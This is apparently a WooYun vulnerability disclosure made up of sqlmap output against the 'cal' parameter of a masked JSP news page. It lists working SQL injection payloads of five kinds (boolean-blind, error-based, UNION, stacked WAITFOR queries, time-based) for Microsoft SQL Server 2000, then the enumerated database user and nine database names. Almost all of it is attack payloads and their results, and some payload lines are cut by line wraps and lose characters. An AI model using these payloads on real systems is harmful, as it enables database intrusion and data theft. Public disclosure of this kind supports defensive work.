WooYun.org

http://**.**.**.**/cn/index.jsp?m=newslist&cal=2

Place: GET
Parameter: cal
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=newslist&cal=2' AND 6383=6383 AND 'rAgT'='rAgT
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: m=newslist&cal=2' AND 9916=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(10
)+CHAR(120)+CHAR(58)+(SELECT (CASE WHEN (9916=9916) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(99)+CHAR(114)+CHAR(120)+CHAR(58))) AND 'qKTa'='qKTa
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: m=newslist&cal=-1503' UNION SELECT CHAR(58)+CHAR(118)+CHAR(107)+CH
R(120)+CHAR(58)+CHAR(72)+CHAR(81)+CHAR(108)+CHAR(66)+CHAR(78)+CHAR(68)+CHAR(102
+CHAR(89)+CHAR(73)+CHAR(122)+CHAR(58)+CHAR(99)+CHAR(114)+CHAR(120)+CHAR(58)--
ND 'rKGe'='rKGe
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: m=newslist&cal=2'; WAITFOR DELAY '0:0:5';-- AND 'xCuf'='xCuf
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: m=newslist&cal=2' WAITFOR DELAY '0:0:5'-- AND 'oZHS'='oZHS
---
[14:17:28] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[14:17:28] [INFO] fetching current user
current user:    'edomuser'

available databases [9]:
[*] agent
[*] edom
[*] ePortal_HR
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb